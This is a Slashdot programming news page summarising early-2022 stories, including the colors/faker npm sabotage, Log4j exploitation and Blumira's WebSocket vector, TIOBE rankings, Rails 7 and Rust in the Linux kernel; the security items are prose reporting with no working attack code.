×
Programming

GitHub Restores Account of Developer Who Intentionally Corrupted His Libraries (thenewstack.io) 193

What happened after a developer intentionally corrupted two of their libraries which collectively had more than 20 million weekly downloads and thousands of dependent projects?

Mike Melanson's "This Week in Programming" column reports: In response to the corrupted libraries, Microsoft quickly suspended his GitHub access and reverted the projects on npm.... While this might seem like an open and shut case to some — the developer committed malicious code and GitHub and npm did what it had to do to protect its users — a debate broke out around a developer's rights to do what they wish with their code, no matter how many projects and dependencies it may have.

"GitHub suspending someone's account for modifying their own code in a project they own however they want spooks me a lot more than NPM reverting a package," [tweeted one company's Director of Engineering & Technology]. "I kind of love what Marak did to make a point and protest to be honest."

An article on iProgrammer further outlines the dilemma present in what might otherwise seem like a clear-cut case.... "Yes, it is open source in that you can fork it and can contribute to it but does this mean that GitHub is justified in denying you the right to change or even destroy your own code?"

As of last night, however, it would appear that the entire affair is merely one for intellectual debate, as GitHub has indeed lived up to what some might view as its end of the bargain: the developer's account is active, he has been allowed to remove his faker.js library on GitHub (depended upon as it might be), and has since offered an update that he does "not have Donkey Brains".

Bitcoin

Jack Dorsey Announces Bitcoin Legal Defense Fund (cointelegraph.com) 23

Former Twitter CEO and Block founder Jack Dorsey has announced plans to create a "Bitcoin Legal Defense Fund" with Chaincode Labs co-founder Alex Morcos and Martin White, who appears to be an academic at the University of Sussex. CoinTelegraph reports: The announcement was sent on a mailing list for Bitcoin developers, bitcoin-dev, at 13:45 UTC on Wednesday from an email address appearing to belong to Dorsey. The announcement stated the fund will help provide a legal defense for Bitcoin developers, who are "currently the subject of multi-front litigation." "Litigation and continued threats are having their intended effect; individual defendants have chosen to capitulate in the absence of legal support," the email stated, referencing open-source developers who are often independent and, therefore, susceptible to legal pressure.

The announcement went on to describe the Bitcoin Legal Defense Fund as a "nonprofit entity that aims to minimize legal headaches that discourage software developers from actively developing Bitcoin and related projects." "The main purpose of this Fund is to defend developers from lawsuits regarding their activities in the Bitcoin ecosystem, including finding and retaining defense counsel, developing litigation strategy, and paying legal bills," it stated. Initially, the fund will include volunteers and part-time lawyers for developers to "take advantage of if they so wish," although, the email also states that "the board of the Fund will be responsible for determining which lawsuits and defendants it will help defend." According to the email, the fund's first project will be to take over the existing defense of Ramona Ang's "Tulip Trading Lawsuit" against developers for alleged misconduct over access to a Bitcoin (BTC) fortune.

Businesses

Wordle Copycats Have Vanished From Apple's App Store (polygon.com) 37

The many Wordle copycats that were flooding Apple's App Store seem to have disappeared. The apps appear to have been removed by Apple shortly after their existence caused a stir on social media. From a report: Wordle itself doesn't have an official iOS app so other developers looked to hop on the coattails of the game's success. But when one in particular started bragging on Twitter about the attention his version of the app was getting, he quickly caught heat, drawing attention to both his app and the many other Wordle clones on the App Store. While there are still a few five-letter word games on the store, they don't have the name Wordle attached like the most egregious ripoffs from the last few days have. Instead these games have named like PuzzWord. There are still a few games left on the App Store that are actually called Wordle, but one was released three years ago and the other was released five years ago with very different concepts from the surprise hit developed by Josh Wardle. While the apps are now gone from the store, the question of why they're gone remains open. There's been no official word from Apple on whether or not the apps were removed because they violated a store rule, or simply because Apple no longer wanted them on the App Store. Either way, for now the only way to play real Worlde on your phone is still to navigate to the website on a browser.
Programming

App Store Developers Made About $60 Billion in 2021, Apple Says (bloomberg.com) 18

Apple said that developers have generated more than $260 billion in revenue since the App Store launched in 2008, up about $60 billion from the figure it reported a year ago. From a report: The iPhone maker made the announcement Monday as part of a summary of the performance of its digital services across 2021. The company said the App Store generated a "new yearly record for App Store developer earnings last year" and that App Store sales between Christmas Eve and New Year's Eve rose in the double digits from the same period a year ago. Apple didn't say how much it generated during that week in 2021 but previously said it made $1.8 billion during that period of 2020.
Programming

Ask Slashdot: Why Do Programmers Make So Many Mistakes? (codinghorror.com) 391

A technical question occurred to Slashdot reader OneHundredAndTen when filling out forms online. "Are the programmers responsible for them stupid, incompetent, lazy, or all rolled into one?"

They provided two real-world examples that inspired the question:

- "I made up a company name that happened to contain a digit. When I submitted the information I got a big fat error diagnostic about this box, to the effect that numerals are not allowed in a company name. So you know, people â" no digits allowed in your company's name, or else!"

- "In a free text box limited to 1,000 characters (already stupid, arguably) the caption explicitly banned the following characters in the "free text" because they can interfere with the correct processing of input..."

~!@#$%^&*()|'

This prompted a response from UnknownSoldier (Slashdot reader #67,820), who shared the humorous "Murphy's Computer Law" aphorisms from 1984, calling them "sadly still appropriate" and referring to one in particular: "There's never time to do it right, but always time to do it over." In general Web programmers tend to be extremely lazy (undisciplined.) They don't value correctness because that would take "work". I'm not just singling out web programmers here, look at how many programmers fuck up the TRIVIAL example of FizzBuzz.

For example, here are two examples where incompetent programmers make tons of assumptions.

* Falsehoods programmers believe about names
* Falsehoods programmers believe about time

As they say the devil is in the details, or edge case, as it may be. Programming is littered with edge cases so bad programmers "stick their head in the sand and ignore the problem hoping it will go away."

Doing it right costs time, money, and skill. Management is partially to blame. Bad programmers are to blame. Schools are to blame. There are many factors why we end up with shit software like the use case you just described.

And now you know why old programmers become grumpy. Modern software is slow, bloated, with layers of abstraction piled upon abstraction, library upon library. You spend more time "decoding" code and reverse engineering what was done because no one ever took the time to comment it properly for the next guy.

Use these examples of "stupid shit" to be a better programmer.

Agree? Disagree? Share your own thoughts in the comments.

Why do programmers make so many mistakes?
Programming

Open Source Developer Intentionally Corrupts His Own Widely-Used Libraries (bleepingcomputer.com) 419

"Users of popular open-source libraries 'colors' and 'faker' were left stunned after they saw their applications, using these libraries, printing gibberish data and breaking.." reports BleepingComputer.

"The developer of these libraries intentionally introduced an infinite loop that bricked thousands of projects that depend on 'colors and 'faker'." The colors library receives over 20 million weekly downloads on npm alone, and has almost 19,000 projects depending on it. Whereas, faker receives over 2.8 million weekly downloads on npm, and has over 2,500 dependents....

Yesterday, users of popular open-source projects, such as Amazon's Cloud Development Kit were left stunned on seeing their applications print gibberish messages on their console. These messages included the text 'LIBERTY LIBERTY LIBERTY' followed by a sequence of non-ASCII characters... The developer, named Marak Squires added a "new American flag module" to colors.js library yesterday in version v1.4.44-liberty-2 that he then pushed to GitHub and npm. The infinite loop introduced in the code will keep running indefinitely; printing the gibberish non-ASCII character sequence endlessly on the console for any applications that use 'colors.' Likewise, a sabotaged version '6.6.6' of faker was published to GitHub and npm....

The reason behind this mischief on the developer's part appears to be retaliation — against mega-corporations and commercial consumers of open-source projects who extensively rely on cost-free and community-powered software but do not, according to the developer, give back to the community. In November 2020, Marak had warned that he will no longer be supporting the big corporations with his "free work" and that commercial entities should consider either forking the projects or compensating the dev with a yearly "six figure" salary....

Some dubbed this an instance of "yet another OSS developer going rogue," whereas InfoSec expert VessOnSecurity called the action "irresponsible," stating: "If you have problems with business using your free code for free, don't publish free code. By sabotaging your own widely used stuff, you hurt not only big business but anyone using it. This trains people not to update, 'coz stuff might break."

GitHub has reportedly suspended the developer's account. And, that too, has caused mixed reactions... "Removing your own code from [GitHub] is a violation of their Terms of Service? WTF? This is a kidnapping. We need to start decentralizing the hosting of free software source code," responded software engineer Sergio Gómez.

"While it looks like color.js has been updated to a working version, faker.js still appears to be affected, but the issue can be worked around by downgrading to a previous version (5.5.3)," reports the Verge: Even more curiously, the faker.js Readme file has also been changed to "What really happened with Aaron Swartz...?"

Squires' bold move draws attention to the moral — and financial — dilemma of open-source development, which was likely the goal of his actions.

Python

TIOBE Announces that the Programming Language of the Year Was Python (thenextweb.com) 90

The programming language of the year has been announced by the TIOBE Index: Python!

But noting that the TIOBE index is based on the number of search results for a programming language across popular search engines, a headline at The Next Web asks: "What does this title even mean?" [TIOBE] takes services such as Google, QQ, Sohu, Amazon, and Wikipedia to calculate the results. TIOBE uses "+" programming" query and a special formula to devise these ratings that change every month. You can read more about the whole process here. The programming language of the year title is decided by the jump in ratings year-on-year. Python overtook C# by a margin of 0.13% — almost a photo finish.

The index doesn't indicate the best or most efficient programming language, nor does it measure the amount of code written in a language across the internet. It simply gives us a high-level understanding of resources and pages available on the web related to them.

There's a huge amount of criticism towards the TIOBE index, especially as it uses one query and doesn't consider non-English languages. The organization said that it's trying to introduce more parameters to calculate the ratings.

TIOBE's annual award is being called "prestigious" — by the announcement at TIOBE.com: The award is given to the programming language that has gained the highest increase in ratings in one year. C# was on its way to get the title for the first time in history, but Python surpassed C# in the last month.

Python started at position #3 of the TIOBE index at the beginning of 2021 and left both Java and C behind to become the number one of the TIOBE index. But Python's popularity didn't stop there. It is currently more than 1 percent ahead of the rest [with a "rating" of 13.58%]. Java's all time record of 26.49% ratings in 2001 is still far away, but Python has it all to become the de facto standard programming language for many domains. There are no signs that Python's triumphal march will stop soon.

In fact, this makes the second year in a row Python has won TIOBE's annual award.

But it's as good a conversation-starter as any. ZDNet reminds us that Microsoft hired Python creator Guido van Rossum in 2020 to work on improving Python's efficiency, while the second most popular language on TIOBE's annual list, C#, "is a language designed by Microsoft technical fellow Anders Hejlsberg for the .NET Framework and Microsoft's developer editing tool Visual Studio."

And ZDNet also spottted a few other patterns in TIOBE's year-end look at programming language popularity: There were several movers and shakers this year. Rust, a systems programming language that deals with memory safety flaws, is now in 26th position, ahead of MIT's Julia, and Kotlin, a language endorsed by Google for Android app development. Rust was a stand out language in 2021, gaining backing from Facebook, Amazon Web Services, Microsoft Azure and Google Cloud.

Apple's Swift for iOS and macOS app development jumped from 13th to 10th place, while Google's Go inched up from 14 to 13, according to Tiobe. Kotlin moved from 40th to 29th. Google's Dart dropped from 25th to 37th position, Julia fell from 23rd to 28th position, while Microsoft TypeScript dropped from from 42 to 49.

The top 10 languages in Tiobe's list for January 2022 were Python, C, Java, C++,C#, Visual Basic, JavaScript, Assembly Language, SQL, and Swift.

Programming

'A Quadrillion Mainframes On Your Lap' (ieee.org) 101

"Your laptop is way more powerful than you might realize," writes long-time Slashdot reader fahrbot-bot.

"People often rhapsodize about how much more computer power we have now compared with what was available in the 1960s during the Apollo era. Those comparisons usually grossly underestimate the difference."

Rodney Brooks, emeritus professor of robotics at MIT (and former director of their AI Lab and CSAIL) explains in IEEE Spectrum: By 1961, a few universities around the world had bought IBM 7090 mainframes. The 7090 was the first line of all-transistor computers, and it cost US $20 million in today's money, or about 6,000 times as much as a top-of-the-line laptop today. Its early buyers typically deployed the computers as a shared resource for an entire campus. Very few users were fortunate enough to get as much as an hour of computer time per week.

The 7090 had a clock cycle of 2.18 microseconds, so the operating frequency was just under 500 kilohertz. But in those days, instructions were not pipelined, so most took more than one cycle to execute. Some integer arithmetic took up to 14 cycles, and a floating-point operation could hog up to 15. So the 7090 is generally estimated to have executed about 100,000 instructions per second. Most modern computer cores can operate at a sustained rate of 3 billion instructions per second, with much faster peak speeds. That is 30,000 times as fast, so a modern chip with four or eight cores is easily 100,000 times as fast.

Unlike the lucky person in 1961 who got an hour of computer time, you can run your laptop all the time, racking up more than 1,900 years of 7090 computer time every week....

But, really, this comparison is unfair to today's computers. Your laptop probably has 16 gigabytes of main memory. The 7090 maxed out at 144 kilobytes. To run the same program would require an awful lot of shuffling of data into and out of the 7090 — and it would have to be done using magnetic tapes . The best tape drives in those days had maximum data-transfer rates of 60 KB per second. Although 12 tape units could be attached to a single 7090 computer, that rate needed to be shared among them. But such sharing would require that a group of human operators swap tapes on the drives; to read (or write) 16 GB of data this way would take three days. So data transfer, too, was slower by a factor of about 100,000 compared with today's rate.

So now the 7090 looks to have run at about a quadrillionth (10 ** -15) the speed of your 2021 laptop. A week of computing time on a modern laptop would take longer than the age of the universe on the 7090.

Businesses

Skillsoft To Acquire Codecademy For $525 Million 6

theodp writes: Online coding lesson purveyor Codecademy, the 2011 YCombinator graduate which arguably kicked off the "Everyone Should Learn to Code" movement with a New Year's 2012 endorsement from then NYC Mayor Michael Bloomberg that went viral, has entered into an agreement to be acquired by Skillsoft for approximately $525 million in cash and stock (SEC 8-K filing). "Like Codecademy," explained Codecademy CEO Zach Sims, "Skillsoft believes in a world where every person and every team has the opportunity to realize their full potential through learning, and together we will continue building that world." According to Crunchbase, Codecademy had raised a total of $87.5 million in funding.
Security

Second Ransomware Family Exploiting Log4j Spotted In US, Europe (venturebeat.com) 16

Researchers say a second family of ransomware has been growing in usage for attack attempts that exploit the critical vulnerability in Apache Log4j, including in the U.S. and Europe. VentureBeat reports: A number of researchers, including at cybersecurity giant Sophos, have now said they've observed the attempted deployment of a ransomware family known as TellYouThePass. Researchers have described TellYouThePass as an older and largely inactive ransomware family -- which has been revived following the discovery of the vulnerability in the widely used Log4j logging software. TellYouThePass is the second family of ransomware that's been observed to exploit the vulnerability in Log4j, known as Log4Shell, joining the Khonsari ransomware, according to researchers.

While previous reports indicated that TellYouThePass was mainly being directed against targets in China, researchers at Sophos told VentureBeat that they've observed the attempted delivery of TellYouThePass ransomware both inside and outside of China -- including in the U.S. and Europe. "Systems in China were targeted, as well as some hosted in Amazon and Google cloud services in the U.S. and at several sites in Europe," said Sean Gallagher, a senior threat researcher at Sophos Labs, in an email to VentureBeat on Tuesday. Sophos detected attempts to deliver TellYouThePass payloads by utilizing the Log4j vulnerability on December 17 and December 18, Gallagher said. TellYouThePass has versions that run on either Linux or Windows, "and has a history of exploiting high-profile vulnerabilities like EternalBlue," said Andrew Brandt, a threat researcher at Sophos, in an email. The Linux version is capable of stealing Secure Socket Shell (SSH) keys and can perform lateral movement, Brandt said. Sophos initially disclosed its detection of TellYouThePass ransomware in a December 20 blog post.

The first report of TellYouThePass ransomware exploiting the Log4j vulnerability appears to have come from the head of Chinese cybersecurity group KnownSec 404 Team on December 12. The attempted deployment of TellYouThePass in conjunction with Log4Shell was subsequently confirmed by additional researchers, according to researcher community Curated Intelligence. In a blog post Tuesday, Curated Intelligence said its members can now confirm that TellYouThePass has been seen exploiting the vulnerability "in the wild to target both Windows and Linux systems." TellYouThePass had most recently been observed in July 2020, Curated Intelligence said. It joins Khonsari, a new family of ransomware identified in connection with exploits of the Log4j vulnerability.

Security

Belgian Defense Ministry Confirms Cyberattack Through Log4j Exploitation (zdnet.com) 10

An anonymous reader quotes a report from ZDNet: The Belgian Ministry of Defense has confirmed a cyberattack on its networks that involved the Log4j vulnerability. In a statement, the Defense Ministry said it discovered an attack on its computer network with internet access on Thursday. They did not say if it was a ransomware attack but explained that "quarantine measures" were quickly put in place to "contain the infected elements." "Priority was given to the operability of the network. Monitoring will continue. Throughout the weekend, our teams were mobilized to contain the problem, continue our operations and alert our partners," the Defense Ministry said. "This attack follows the exploitation of the Log4j vulnerability, which was made public last week and for which IT specialists around the world are jumping into the breach. The Ministry of Defense will not provide any further information at this stage."

Multiple reports from companies like Google and Microsoft have indicated that government hacking groups around the world are leveraging the Log4j vulnerability in attacks. [...] Centre for Cybersecurity Belgium spokesperson Katrien Eggers told ZDNet that they too sent out a warning to Belgian companies about the Apache Log4j software issue, writing that any organization that had not already taken action should "expect major problems in the coming days and weeks." "Because this software is so widely distributed, it is difficult to estimate how the discovered vulnerability will be exploited and on what scale," the Centre for Cybersecurity Belgium said, adding that any affected organizations should contact them. "It goes without saying that this is a dangerous situation."

Businesses

Inside Ubisoft's Unprecedented 'Exodus' of Developers (axios.com) 36

Colleagues across Ubisoft have names for the procession of developers who have departed over the past 18 months: "the great exodus" and "the cut artery." Across the company's global network of studios, which at 20,000-plus employees is one of gaming's largest workforces, many developers have decided it's time to quit. And many of their colleagues describe a flow of goodbyes that they've never seen before. Axios reports: Top-name talent is leaving, with at least five of the top 25-credited people from the company's biggest 2021 game, Far Cry 6, already gone. Twelve of the top 50 from last year's biggest Ubisoft release, Assassin's Creed Valhalla, have left too. (A 13th recently returned.) Also out are midlevel and lower-level workers as headcounts drop, particularly in Ubisoft's large and normally growing Canadian studios. LinkedIn shows Ubisoft's Montreal and Toronto studios each down at least 60 total workers in the last six months. Two current developers tell Axios the departures have stalled or slowed projects. One developer recently said a colleague currently at Ubisoft contacted them to solve an issue with a game, because no one was still there who knew the system.

Interviews with a dozen current and former Ubisoft developers cite a range of factors for the departures, including low pay, an abundance of competitive opportunities, frustration at the company's creative direction, and unease at Ubisoft's handling of a workplace misconduct scandal that flared in mid-2020. One developer with more than a decade of experience at Ubisoft before recently leaving said the company is "an easy target for recruiters," given the company's myriad issues. Said another now-former Ubisoft worker who was disappointed by directives from the company's Paris HQ: "There's something about management and creative scraping by with the bare minimum that really turned me away." Many spoke fondly of much of their time at the company, and one said they'd even consider returning, but the past year and a half was a breaking point.
"Management says it's on top of it, telling Axios that attrition is up but that the company has hired 2,600 workers since April," the report adds.

"A spokesperson noted that questions in a recent companywide survey, about whether employees are happy at the company and would 'recommend Ubisoft as a great place to work,' returned a score of 74, which they said was in line with the industry average."
Google

More Than 35,000 Java Packages Impacted by Log4j Vulnerabilities, Google Says (therecord.media) 39

Google's open-source team said they scanned Maven Central, today's largest Java package repository, and found that 35,863 Java packages use vulnerable versions of the Apache Log4j library. From a report: This includes Java packages that use Log4j versions vulnerable to the original Log4Shell exploit (CVE-2021-44228) and a second remote code execution bug discovered in the Log4Shell patch (CVE-2021-45046). James Wetter and Nicky Ringland, members of the Google Open Source Insights Team, said in a report today that typically when a major Java security flaw is found, it typically tends to affect only 2% of the Maven Central index. However, the 35,000 Java packages vulnerable to Log4Shell account to roughly 8% of the Maven Central total of ~440,000, a percentage the two described using just one word -- "enormous." But since the vulnerability was disclosed last week, Wetter and Ringland said the community has responded positively and has already fixed 4,620 of the 35,863 packages they initially found vulnerable. This number accounts to 13% of all the vulnerable packages.
Programming

Ruby on Rails Creator Touts 7.0 as One-Person Framework, 'The Way It Used To Be' (hey.com) 62

David Heinemeier Hansson is the creator of Ruby on Rails (as well as the co-founder and CTO of Basecamp, makers of the email software HEY). But he says Wednesday's release of version 7.0 is the version he's been longing for, "The one where all the cards are on the table. No more tricks up our sleeves. The culmination of years of progress on five different fronts at once." The backend gets some really nice upgrades, especially with the encryption work that we did for HEY, so your data can be encrypted while its live in the database.... But it's on the front end things have made a quantum leap. We've integrated the Hotwire frameworks of Stimulus and Turbo directly as the new defaults, together with that hot newness of import maps, which means you no longer need to run the whole JavaScript ecosystem enchilada in your Ruby app...

The part that really excites me about this version, though, is how much closer it brings us to the ideal of The One Person Framework. A toolkit so powerful that it allows a single individual to create modern applications upon which they might build a competitive business. The way it used to be... Rails 7 seeks to be the wormhole that folds the time-learning-shipping-continuum, and allows you to travel grand distances without knowing all the physics of interstellar travel. Giving the individual rebel a fighting chance against The Empire....

The key engine powering this assault is conceptual compression. Like a video codec that throws away irrelevant details such that you might download the film in real-time rather than buffer for an hour. I dedicated an entire RailsConf keynote to the idea...

[I]f there ever was an opening, ever was a chance that we might at least tilt the direction of the industry, now is it.

What a glorious time to be working in web development.

Programming

Is Wolfram the Smartest Programming Language In the Room? (wolfram.com) 113

theodp writes: Out of the box, does your programming language support Chemical Formulas & Chemical Reactions? Making Videos from Images & Videos? Integrals? Real Numbers? Graph Trees? Leap Seconds? Bio Sequences? Flight Data? Vector Displacement Plots? Lighting? Machine Learning? Tracking Robots? Notebooks? Creating, Deploying and Grading Quizzes? Analysis of Email Threads? Access to 2,249 User-Defined Functions? NFTs?

These are just some of the feature upgrades Stephen Wolfram touched upon as announced the launch of Version 13 of Wolfram Language and Mathematica in a Dec. 13th blog post (for more, see What's New in Mathematica 13). Sign up for free access to Wolfram Cloud Basic here, kids! So, is Wolfram the "smartest programming language in the room"?

Java

Security Firm Blumira Discovers Major New Log4j Attack Vector (zdnet.com) 91

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099., although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants.
Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. "
Programming

Apple Releases Swift Playgrounds 4 (techcrunch.com) 8

Apple announced that it has officially released Swift Playgrounds 4. The tech giant first announced the upcoming launch of the new software at WWDC earlier this year. From a report: With this latest launch, the software now lets users build iPhone and iPad apps with SwiftUI directly on their iPad. It also allows you to preview apps in real time as you make changes to your app. Apple notes that developers are now able to upload their finished app to the App Store with its "App Store Connect" integration. "Swift Playgrounds is the best and easiest way to learn how to code," Apple said in a blog post. "Code is immediately reflected in the live preview as you build apps, and you can run your apps full screen to test them out. A new open project format based on Swift packages can be opened and edited in Swift Playgrounds for iPad, as well as within Xcode on Mac, offering you even more versatility to develop apps across iPad and Mac."
Programming

At EA, It Can Take a Whole Day To Change 3 Lines of Code (neowin.net) 145

New submitter segaboy81 writes: In 2001 the Manifesto for Agile Software Development was born, and it took the software engineering world by storm. Linux, Windows, Facebook, AAA games, and just about everything else, adheres to this manifesto in some form or another. It is a paradigm that allows teams to work collaboratively on projects in the most effective and streamlined way possible. However, EA may not have gotten the memo. According to a blogpost by former EA developer Adam Berg, different teams take very different approaches to development with one team in particular being especially slow to progress. Adam recounts his experience on the FIFA team where he worked on the Wii, PS Vita, and Nintendo 3DS ports of the game: "I often worked in the realm of competition logic. Testing changes here could mean progressing through several seasons of career mode in order to test out a change. No joke, it would take an entire day to change 3 lines of code and know that it actually worked correctly."
Programming

The Linux Kernel's Second Language? Rust Gets Another Step Closer (phoronix.com) 116

"In 2022 we will very likely see the experimental Rust programming language support within the Linux kernel mainlined," writes Phoronix, citing patches sent out Monday "introducing the initial support and infrastructure around handling of Rust within the kernel."

This summer saw the earlier patch series posted for review and discussion around introducing Rust programming language support in the Linux kernel to complement its longstanding C focus. In the months since there has been more progress on enabling Rust for the Linux kernel development, Linus Torvalds is not opposed to it, and others getting onboard with the effort. Rust for the Linux kernel remains of increasing interest to developers over security concerns with Rust affording more memory safety protections, potentially lowering the barrier to contributing to the kernel, and other related benefits....

Miguel Ojeda sent out the "v2" patches for Rust support in the kernel. With these updated packages, the Rust code is now relying on stable Rust releases rather than the beta compiler state previously, new modularization options added, stricter code enforcements, extra Rust compiler diagnostics enabled, new abstractions for in-kernel use, and other low-level code improvements.

Red Hat is also now joining Arm, Google, and Microsoft in voicing their support for Rust code within the Linux kernel.

ZDNet contributing editor Steven J. Vaughan-Nichols also expects the first Rust code in Linux's kernel sometime in 2022: As Ryan Levick, a Microsoft principal cloud developer advocate, explained, "Rust is completely memory safe." Since roughly two-thirds of security issues can be traced back to handling memory badly, this is a major improvement. In addition, "Rust prevents those issues usually without adding any runtime overhead," Levick said.

Slashdot Top Deals